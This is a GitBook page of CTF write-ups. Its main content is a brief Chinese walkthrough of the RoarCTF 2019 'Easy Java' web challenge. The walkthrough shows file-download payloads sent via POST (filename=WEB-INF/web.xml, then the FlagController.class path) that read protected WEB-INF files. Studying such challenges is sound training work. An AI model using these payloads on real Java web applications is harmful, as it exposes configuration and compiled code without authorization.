📕 WriteUp
  • Introduction
  • NewStarCTF 2023
  • MoeCTF 2023
  • DASCTF Jul.2023
  • LitCTF 2023
  • 蓝桥杯 2023
  • NSSRound#13
  • GDOUCTF 2023
  • MoeCTF 2022
  • SWPUCTF 2022
  • SWPUCTF 2021
  • MoeCTF 2021
  • NPUCTF 2020
  • MRCTF 2020
  • GYCTF 2020
  • BJDCTF 2020
  • 网鼎杯 2020
  • CISCN 2019
  • 极客大挑战 2019
  • 安洵杯 2019
  • 强网杯 2019
  • SUCTF 2019
  • De1CTF 2019
  • SWPUCTF 2019
  • ZJCTF 2019
  • RoarCTF 2019
  • GWCTF 2019
  • GXYCTF 2019
  • WesternCTF 2018
  • HCTF 2018
  • 护网杯 2018
  • 网鼎杯 2018
  • BUUCTF 2018
Powered by GitBook
On this page
  • Web
  • Easy Java

RoarCTF 2019

PreviousZJCTF 2019NextGWCTF 2019

Last updated 1 year ago

Web

Easy Java

这是一道关于 Java WEB 的题目,通过点击 Help 按钮跳转到 /Download?filename=help.docx 会回显 java.io.FileNotFoundException:{help.docx}

WEB-INF

WEB-INF 是 Java 的 web 应用的安全目录,属于敏感目录,目录结构(模拟)如下图

因此可以尝试 payload filename=WEB-INF/web.xml ,发现无法得到内容,尝试使用 POST 进行传入,可以得到以下内容

   <servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>FlagController</servlet-name>
        <url-pattern>/Flag</url-pattern>
    </servlet-mapping>

通过使用 /WEB-INF/classes/ 来找 flag 即可,构造 payload filename=/WEB-INF/classes/com/wm/ctf/FlagController.class 就可以得到 flag 了